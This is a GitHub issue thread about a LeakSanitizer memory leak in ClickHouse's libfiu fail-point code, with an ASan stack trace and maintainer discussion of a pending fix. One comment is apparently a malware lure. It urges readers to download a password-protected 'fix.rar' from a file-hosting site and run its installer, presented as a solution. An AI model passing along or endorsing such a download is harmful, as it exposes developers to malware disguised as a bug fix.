### ISSUE TITLE
LeakSanitizer: detected memory leaks fiu_enable

### ISSUE THREAD

**Issue by qoega** [ClickHouse/ClickHouse#68899]
`test_parallel_replicas_failover/test.py::test_skip_unresponsive_replicas[5-5]`

https://s3.amazonaws.com/clickhouse-test-reports/68380/9339c0593b354dbb54b418425c6cfe1ac37e556c/integration_tests_flaky_check__asan_.html

```
=1==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 164 byte(s) in 4 object(s) allocated from:
    #0 0x557f03f0b2ea in strdup (/usr/bin/clickhouse+0xa9e82ea) (BuildId: fe57e201d1ef85b14f5dacec49378e5d014b8124)
    #1 0x557f2da8225d in hash_set build_docker/./contrib/libfiu/libfiu/wtable.c:286:24
    #2 0x557f2da8225d in wtable_set build_docker/./contrib/libfiu/libfiu/wtable.c:797:10
    #3 0x557f2da80259 in insert_pf build_docker/./contrib/libfiu/libfiu/fiu.c:391:12
    #4 0x557f2da80259 in fiu_enable build_docker/./contrib/libfiu/libfiu/fiu.c:408:9
    #5 0x557f1425fb47 in DB::FailPointInjection::enableFailPoint(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>> const&) build_docker/./src/Common/FailPoint.cpp:157:5
    #6 0x557f22fd3f56 in DB::InterpreterSystemQuery::execute() build_docker/./src/Interpreters/InterpreterSystemQuery.cpp:763:13
    #7 0x557f22f7381f in DB::executeQueryImpl(char const*, char const*, std::__1::shared_ptr<DB::Context>, DB::QueryFlags, DB::QueryProcessingStage::Enum, DB::ReadBuffer*) build_docker/./src/Interpreters/executeQuery.cpp:1229:40
    #8 0x557f22f6cea4 in DB::executeQuery(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>> const&, std::__1::shared_ptr<DB::Context>, DB::QueryFlags, DB::QueryProcessingStage::Enum) build_docker/./src/Interpreters/executeQuery.cpp:1395:26
    #9 0x557f265601c4 in DB::TCPHandler::runImpl() build_docker/./src/Server/TCPHandler.cpp:564:54
    #10 0x557f2659241f in DB::TCPHandler::run() build_docker/./src/Server/TCPHandler.cpp:2484:9
    #11 0x557f2d8aab0e in Poco::Net::TCPServerConnection::start() build_docker/./base/poco/Net/src/TCPServerConnection.cpp:43:3
    #12 0x557f2d8ab6f6 in Poco::Net::TCPServerDispatcher::run() build_docker/./base/poco/Net/src/TCPServerDispatcher.cpp:115:38
    #13 0x557f2d7ade0a in Poco::PooledThread::run() build_docker/./base/poco/Foundation/src/ThreadPool.cpp:205:14
    #14 0x557f2d7a7f67 in Poco::ThreadImpl::runnableEntry(void*) build_docker/./base/poco/Foundation/src/Thread_POSIX.cpp:335:27
    #15 0x557f03f21058 in asan_thread_start(void*) crtstuff.c

SUMMARY: AddressSanitizer: 164 byte(s) leaked in 4 allocation(s).
```

@hanfei1991 as you know something about fiu

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by qoega** [comment]
@hanfei1991 
I see failure today in this PR
https://s3.amazonaws.com/clickhouse-test-reports/68380/c6b2d81af7c998a533eaba45268e4cc555e9225b/integration_tests_flaky_check__asan_//home/ubuntu/actions-runner/_work/_temp/test/output_dir/integration_run_flaky27_0.log
https://s3.amazonaws.com/clickhouse-test-reports/68380/c6b2d81af7c998a533eaba45268e4cc555e9225b/integration_tests_flaky_check__asan_.html

**Comment by hanfei1991** [comment]
@qoega the stack trace is old, it seems this PR is not run with my fix.

**Comment by qoega** [comment]
> @qoega the stack trace is old, it seems this PR is not run with my fix.

Ok, lets check how it goes in master. But PR should use latest master+branch version after last commit to run tests if it is mergeable, so it should include changes from last week.
